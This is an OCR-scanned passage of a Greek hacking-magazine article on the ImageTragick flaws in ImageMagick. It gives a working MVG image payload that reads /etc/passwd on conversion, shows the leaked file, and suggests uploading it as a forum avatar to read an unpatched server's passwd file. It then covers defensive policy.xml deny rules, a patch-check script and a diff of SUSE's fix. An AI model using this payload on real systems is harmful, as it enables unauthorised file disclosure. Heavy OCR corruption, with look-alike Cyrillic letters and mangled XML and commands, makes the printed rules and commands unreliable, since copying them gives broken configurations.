δει τα περιεχόμενα του αρχείου /еїс/раѕѕуога. Το µόνο που έχει να κάνει, εἶναι ν' 
αλλάξει τον κώδικα του read.jpg ως εξής (προσέξτε την τρίτη γραμμή, την "image 
over"): 


push graphic-context 

viewbox 0 0 640 480 

image over 0,0 0,0 'label:@/etc/passwd' 
popgraphic-context 


Αυτό ήταν, τόσο εὐκολο. Τώρα, απλά δοκιμάστε να κάνετε convert την εικόνα σας: 


panos@ohsuse:~/test/PoCs> convert read.jpg image.png 


convert: non-conforming drawing primitive definition `popgraphic-context' @ 
error/draw.c/DrawImage/3178. 


Αν δεν θέλετε να βλέπετε μηνύματα λάθους, απλά ανακατευθύνετέ та ото /dev/null: 


panos@ohsuse:~/test/PoCs> convert read.jpg image.png 2» /dev/null 
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Προκειμένου να επαληθεύσουµε ότι όλα λειτούργησαν ката τα αναμενόμενα, αρκεί 
у ανοίξουμε την εικόνα image.png και να παρατηρήσουμε αν τα περιεχόμενα του / 
etc/passwd απεικονίζονται σ' αυτή. 


File Edit View Search Terminal Help 
panos@ohsuse:~/test/PoCs> 
panosęĝohsuse:~/test/PoCs> 
push graphic-context 

viewbox © Ө 640 480 

image over 0,0 0,0 'label:@/etc/passwd' 
popgraphic-context 
panosĝohsuse:~/test/PoCs> 
panos@ohsuse:~/test/PoCs> 
panos@ohsuse:~/test/PoCs> 
panosĝohsuse:~/test/PoCs> 


Jser for Avahisrunavahi- μμ μα 
255. 498:User for Avahi ІРу411 >маг/1іб/амаћі-аџіоіра:Љіпиаіѕе 
Jbinbash 


arlib/emptyJbin/false 
nbash 
гмагдатеѕіпваѕћ 
83:482:бпоте Display Manager daemon var/lib'gdm-bin/false 
inting daemon:var/spool/l nbash 
Mailer qaemonvar/spool/cientmgueue 
Manual ра es міемеглғагсасће/т 
messagebusx 498:495:User for D-Bus; 
пемн:х:9: 13:News ѕуѕіетеіс/пелв: 
openconnect/sbin/nologin 
in/nologin 


ulseaudio/sbin/ /nologin 


53 user Tor ропе; змагиїогетріузеріп/поіодіп 
altimeKit/procvbin/false 
SrvGeoClue x:496:65534:User for GeoClue D-Bus service-ar/libisrvGeoClue:/sbin/nologin 
89:55Н даетоп:уаг/ 
5534:NFS statd даето! 
1495:492:ТЕТР ассоипіузгићйроооїоі 
10:14:Unix-to-Unix Сору system 
user tor VNCvar/lib/emp! 
WWW daemon арасһе:Агаглї 


Σε éva forum όπου το ImageMagick δεν είναι αναβαθμισμένο και παραμένει 
ευπαθές ως προς το ΟΥΕ-2016-8717, то avatar του χρήστη µας θα μπορούσε 
γα είναι τα περιεχόμενα του αρχείου /etc/passwd. Μιλάμε για то passwd στο 
απομακρυσμένο σύστημα, φυσικά ;) 


panos@ohsuse :~/test/PoCs> 


Ένα τρελό σενάριο θα ήταν va πάτε σε κάποιο forum KALVA δοκιμάσετε у ανεβάσετε 
αυτή την εικόνα (геаајро) ос̧ avatar του χρήστη σας. Αν η πλατφόρμα χρησιμοποιεί 
то ImageMagick και δεν εἶναι patched, τότε θα καταλήξετε µε εικόνα προφίλ та TE- 
ριεχόµενα του αρχείου /еїс/раѕѕма. 
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Πώς το φτιάχνω, χωρίς να περιμένω άλλον να το φτιάξει; 

Κατ’ αρχάς, αν κάνετε τακτικά updates εἰναι σχεδόν βέβαιο ὁτι είστε ήδη προ- 
στατευμένοι ως προς то ImageTragick. Н αρχική λύση που προτάθηκε, πριν акорд 
βγουν τα απαραίτητα patches, ήταν να εφαρμοστούν κανόνες апо το διαχειριστή 
του συστήµατος έτσι WOTE να αποτρέπεται το delegation για https, http, mvg, label, 
ephemeral κι άλλες βιβλιοθήκες, όταν αυτές βρίσκονται µέσα σε αρχεία εικόνας. 
Προσέξτε: Μιλάμε тора үа λύσεις που κάθε μάχιμος υπεύθυνος ασφαλείας σπεύ- 
δει κι εφαρμόζει, χωρίς να επαναπαύεται περιμένοντας απλά µια ουρανοκατέβατη 
λύση. Εν προκειμένω, η προτεινόμενη λύση υλοποιείται προσθέτοντας то парака- 
τω κομμάτι κώδικα στο αρχείο /etc/ImageMagick*/policy.xml. 


<ро11сутар> 


<ро11су дотаіп="сойег" rights="none" pattern="EPHEMERAL" /» 
«ρο]1εγ дотаіп="сойег" rights="none" pattern="HTTPS" /> 
<ро1ісу дотаіп="сойег" rights="none" pattern="HTTP" /> 
<ро1ісу дотаіп="сойег" rights="none" раёёегп= "ОК" /» 
<ро11су дотаіп="сойег" rights="none" pattern="FTP" /» 
<ро1ісу дотаіп="сойег" rights="none" раїёегп= "ММС" /> 
<ро1ісу дотаіп="сойег" rights="none" pattern="MSL" /> 
<ро11су дотаіп="сойег" rights="none" раїёегп= "ТЕХТ" /» 
<ро1ісу допаіп="сойег" rights="none" pattern="LABEL" /» 
<ро1ісу domain="path" rights="none" pattern="@*" /» 
</policymap> 


Σε διανομές Linux που δεν διαθέτουν πρόσφατες εκδόσεις του ImageMagick (>= 
7.0.1-0) αλλά τη legacy (<= 6.9.3-9), το αρχείο ρο!ϊογ.χπη| απλά απουσιάζει και πρέπει 
ν' αλλάξουν οι coders. Συγκεκριµένα, αλλάζουμε τις καταλήξεις κάποιων αρχείων, 
ἐτσι WOTE ακόµα κι όταν εκδηλώνεται το bug να µην ενεργοποιείται το delegation 
για τα αντίστοιχα image formats. Σε συστήµατα 64bit μεταβαίνουμε στον κατάλο- 
yo /usr/lib64/ImageMagick-6.2.8/modules-Q16/coders, ενώ σε συστήµατα 32bit στον 
κατάλογο /usr/lib/ImageMagick-6.2.8/modules-Q16/coders. Σε κάθε περίπτωση, фро- 
ντίζουμε για τις ακόλουθες μετονομασίες: 


mvg.so > mvg.so.old 


Π5],5ο » πο].5ο.ο]4 
1406]. 5ο > label.so.old 
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Επαναλαμβάνουµε ότι τα προηγούμενα αποτελούν πρὀχειρες ἡ αν θέλετε προσω- 
ρινές λύσεις, µέχρι να κυκλοφορήσουν τα επίσηµα upstream patches των developers 
του ImageMagick. Τη στιγμή που γράφεται το παρόν έχουν ήδη κυκλοφορήσει ка 
βρίσκονται στο 


Κάπου εδώ, λογικό εἶναι κάποιοι у αναρωτιούνται τι πρέπει να κάνουν, αν πρέπε 
να κάνουν κάτι, κάθε φορά που ένας upstream developer δημοσιεύει patches για το 
εργαλείο, τη βιβλιοθήκη ή την εφαρµογή που αναπτύσσει. Н αλήθεια εἰναι ότι ο 
ερισσότεροι χρήστες αρκεί να περιμένουν το αντίστοιχο ενημερωμένο TAKÉTO yla 
τη διανομή της. Το περιοδικό που διαβάζετε όµως ονομάζεται deltaHacker κι ÓX 
дӢеїаЕпауѕег, οπότε θεωρούμε πως αρκετοί апо εσάς ενδιαφέρονται να μαθαίνουν 
ερισσότερα για όλα όσα συζητάμε. Εν προκειμένω, ίσως θα ήθελαν να γνωρίζουν 
ότι ο (καλός) maintainer κάθε διανομής ψαρεύει τα git commits που κρίνει ότι siva 
καταλληλότερα για το σύστημα ευθύνης του, κι ακολούθως δημιουργεί το δικὀ του 
раїсһ. 


Στη δική µας περίπτωση, όπως ήδη αναφέραμε εργαζόµαστεσε σύστημα openSUSE 
Leap 42.1. Γνωρίζουμε ὁτι то openSUSE bug για то ImageTragick εἶναι το бпс#978061 
( ) και υπάρχει και σχετική ανα- 
κοίνωση στο . Επειδή µας 
εἶναι αρκετά κουραστικό να ψάχνουμε κάθε φορά για то πώς μπορούμε να κάνουμε 


File Edit Ме 
panos@ohsus: en 
TETTA T 
Resolving raw.githubusercontent.com (гам. githubusercontent.com)... 23.235.43.133 

Connecting to raw.githubusercontent.com (raw. githubusercontent.com) |23.235.43.133|:443... connected. 
HTTP request sent, awaiting response... 200 ОК 

Length: 13017 (13K) [text/plain] 

Saving το: ‘bugpatch. sh’ 


100%[ 


2016-05-21 08:40:41 (241 KB/s) - ‘bugpatch.sh’ saved [13017/13017] Fie Edit Vi 
libMagickCore-6_Q16-1 

panos@ohsus: libMagickWand-6_Q16-1 -9. 

panos@ohsus: ‹ ch.sh libMagickwand-6_Q16-1-debuginfo 

рапоз@оһзизе:=/ perl-PerlMagick 

panos@ohsuse:~/test> . 1.55 perl-PerlMagick-debuginfo 

ο πο ο ορ ποστς. 

1. Needed (14) Patch provides the following fixed packages: 

2. Installed (522) 

3. Not Needed (677) 
ImageMagick-doc 
TibMagick++-6_016-3-3: 
TibMagick++-6_Q16-3-d! 
libMagickt+-devel-32b 
TibMagickCore-6_016-1-32b1 


'openSUSE-2016-574' libMagickCore-6_Q16-1-debuginfo-32b; 
И libMagickwand-6_016-1-32bit-6.8.8. 1-9. 
| Category | Severity | Status libMagickwand-6_Q16-1-debuginfo-32bit- 


ImageMagick-6.8.8.1-9.1 
Main Update Re | openSUSE-2016-574 | security | important | Needed fImageMagick-debuginfo 
openSUSE-Leap-42. | openSUSE-2016-574 | security | important | Needed fImageMagick-debugs: 


ImageMagick-devel- 
ImageMagick-extra-i 9 
Vulnerable packages іп your system: ЖУГА Парт -re-i 


ImageMagick-devel-32bit 

ImageMagick-doc.noarch 

libMagick++-6_Q16-3-32bit TibMagickCore-6_Q1 

libMagick++-6_Q16-3-debuginfo-32bit προ ες 

libMagick++-devel-32bit TibMagickwand-6. 

libMagickCore-6_Q16-1-32bit libMagickwand-6_Q1 
perl-PerlMagick-6.8.8.1-9.1 
perl-PerlMagick-debuginfo-6.8.8.1-9.1 


System status: 


Κατεβάζουµε και τρέχουμε το script ονόματι bugpatch.sh. Μετά апо λίγο αποκαλύπτονται οι όποιες 
αδυναμίες έχει η εγκατάσταση του openSUSE µας. Αν έχει κάποιες (γνωστές) αδυναμίες, τότε µας 
δίνονται και οδηγίες για την εφαρµογή των αντίστοιχων patches (βλ. κάτω από то "How to fix it"). 
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κάτι, ἔχουμε γράψει éva script το οποίο βρίσκεται ακόμη υπό ανάπτυξη και διατίθε- 
ται апо το Github του αρθρογράφου: https://raw.githubusercontent.com/drpaneas/ 
bugpatch/master/bugpatch.sh 


Τρέχοντας то bugpatch.sh διαπιστώσαμε ότι то σύστημά µας εἰναι ευπαθές, καθώς 
κι ότι χρειαζόμαστε το patch ореп$08Е-2016-574. Н εφαρμογή του patch γίνεται ως 
ακολούθως: 


panos@ohsuse:~/test> sudo zypper install -t patch ореп505Е-2016-574 


Το πριν και το µετά 


Πα να δούμε τις αλλαγές που εφαρμόστηκαν και διόρθωσαν τα προβλήματα του 
ImageMagick, πρέπει να κατεβάσουμε το Source RPM της νέας έκδοσης και να KÅ- 
νουµε diff µε την παλιά. Όπως θα θυµόσαστε апо το άρθρο της σελίδας 30, έχουμε 
ήδη πάρει τον κώδικα тпс ευπαθούς έκδοσης κι αυτή τη στιγμή εἶναι στον κατάλογο 
/tmp/test/before. Ора να πάρουμε και τον κώδικα της νέας, διορθωµένης έκδοσης. 
Αυτόν θα тоу αποθηκεύσουµε στον κατάλογο /tmp/test/after: 


рапоѕ@оһћѕиѕе:~> са /tmp/test/after 


panos@ohsuse:/tmp/test/after> wget http://download.opensuse.org/update/ 
1еар/42.1/055/5гс/ІтареМаріск-6.8.8.1-9.1.5гс.грт 


panos@ohsuse:/tmp/test/after> ипгрт ІтареМаріск-6.8.8.1-9.1.5гс.грт 
panos@ohsuse:/tmp/test/after> tar -xf ІтареМаріск-6.8.8-1.{аг. х2 
panos@ohsuse:/tmp/test/after> cd .. 

panos@ohsuse:/tmp/test> 


Προκειμένου να συγκρίνουμε τα δύο Source RPMs, καταφεύγουμε στο εργαλείο diff: 


panos@ohsuse:/tmp/test> diff -Nur ΡεΤοΓε/ after/ > source.diff 


Μέσα στο αρχείο source.diff θα πρέπει λογικά να υπάρχουν ol διαφορές μεταξύ 
της παλιάς (προβληματικής) και της καινούριας (επιδιορθωµένης) έκδοσης του 
ImageMagick. Οι αλλαγές που οφείλονται σε προσθήκες σηματοδοτούνται µε то 
σύμβολο "+", ενω οι αλλαγές που οφείλονται σε αφαίρεση µε то σύμβολο "-". Ανοίξτε 
το αρχείο µε τον αγαπημένο σας editor (η καρδιά µας ανήκει στο vim): 


panos@ohsuse:/tmp/test> vim source.diff 
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Παραθέτουµε το αποτέλεσµα της σύγκρισης έτοιμο, στον ακόλουθο σύνδεσμο: 
http://pastebin.com/UGB2pcjW. Εξετάζοντάς το, ανακαλύπτουμε τις αλλαγές που 
φέρνει το νέο πακέτο για τη διανομή µας: Αρχικά βλέπουμε ότι αλλάζει η прерорц- 
via στο copyright, αφού η προηγούμενη έκδοση κυκλοφόρησε το 2015 και η καινού- 
ρια εἰναι η πρώτη αναβάθµιση για φέτος: 


-# Copyright (c) 2015 SUSE LINUX GmbH, Nuernberg, Germany. 
+# Copyright (c) 2016 SUSE LINUX GmbH, Nuernberg, Germany. 


Στη συνέχεια εντοπίζουµε την αλλαγή της έκδοσης: 


-Ве1еаѕе: (5.1 
+Ке1еаѕе: om 


Ιδού και TO patch που προστέθηκε και φτιάχνει το πρὀβλημάτου ImageTragick: 
+Раїсһ20: ImageMagick-6.8.8-1-disable-insecure-coders.patch 
+%patch20 -p1 


To ImageMagick εξάλλου µεταγλωττίστηκε µε υποστήριξη εξωτερικού rsvg loader 
(ναι, ὁτι κι αν σηµαίνει αυτό): 


+ --with-rsvg=yes \ 
Στο changelog βλέπουμε ша περίληψη των αλλαγών: 


%changelog 
+* Wed May 4 2016 sflees@suse.de 
+- Use external svg loader (rsvg) 
+- Disable insecure coders [bnc#978061] 
+ * ImageMagick-6.8.8-1-disable-insecure-coders.patch 
+ * CVE-2016-3714 
+ * CVE-2016-3715 
+ * CVE-2016-3716 
Ж 

κ 


(νΕ-2016-3717 
+ СМЕ -2016-3718 


Τέλος, ρίχνουμε μία ματιά και στο patch: 
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--- реҒоге/ІтареМаріск-6.8.8-1-1ѕар1е-іпѕесиге-сойегѕ.раёсһ 1970-01-01 
01:00:00. 000000000. +0100 


+++ а?ёег/ІтареМаріск-6.8.8-1-01ѕар1Іе-іпѕесиге-сойегѕ.раёсһ 2016-05-07 
09:44:35.000000000 +0200 


08 -0,0 +1,23 ϐ8 
+ріѕар1Іе insecure loaders ру default 05с#978061 
+ѕЙееѕ@ѕиѕе. de 


+ 


+Іпаех: ImageMagick-6.8.8-1/config/policy.xml 


+--- ImageMagick-6.8.8-1.orig/config/policy.xml 2013-01-14 14:57:39.000000000 
+0100 


++++ ImageMagick-6.8.8-1/config/policy.xml 2016-05-06 10:03:49.137177736 +0200 
+00 -56,4 156,15 @@ 

+ «Ι-- «ρο]1εγ дотаіп="геѕоигсе" name="time" να]ιε-"3600"/» --> 

+ <!-- «ρο]1εγ domain="system" пате="ргесіѕіоп" value="6"/> --> 

+ <ро1ісу допаіп="сасһе" пате="ѕһагей-ѕесге" ма1ие="раѕѕрһгаѕе"/> 
++ <!-- Disable insecure coders ру default --> 

++ <!-- https://bugzilla.suse.com/show_bug.cgi?id=978061 --> 

++ <policy domain="coder" rights="none" pattern="EPHEMERAL" /> 

++ <policy domain="coder" rights="none" pattern="URL" /> 

++ <policy domain="coder" rights="none" pattern="HTTPS" /> 

++ <policy domain="coder" rights="none" pattern="MVG" /> 

++ <policy domain="coder" rights="none" pattern="MSL" /> 

++ <policy domain="coder" rights="none" pattern="TEXT" /> 

++ <policy domain="coder" rights="none" pattern="SHOW" /> 

++ <policy domain="coder" rights="none" pattern="WIN" /> 

++ <policy domain="coder" rights="none" pattern="PLT" /> 

+ </policymap> 


Συνειδητοποιούµε От, στην ουσία, οι μηχανικοί της SUSE πήραν την προσωρινή 
λύση (workaround) που περιγράψαµε προηγουμένως κι έφτιαξαν éva patch μ' αυτή. 
Έτσι, ακόµη κι όσοι δεν επενέβησαν χειροκίνητα στο /etc/ImageMagick*/policy. 
xml, µε το που θα κάνουν update στο openSUSE Leap (δίνοντας είτε "Ζγρρει ир" είτε 
"Ζγρρεί patch"), θα δουν τις αλλαγες στο роЇісу.хті να εφαρμόζονται και θα εἰναι 
προστατευμένοι. 


Καλό hacking σάς ευχόμαστε - και have fun 


Б? 


deltahacker.gr 


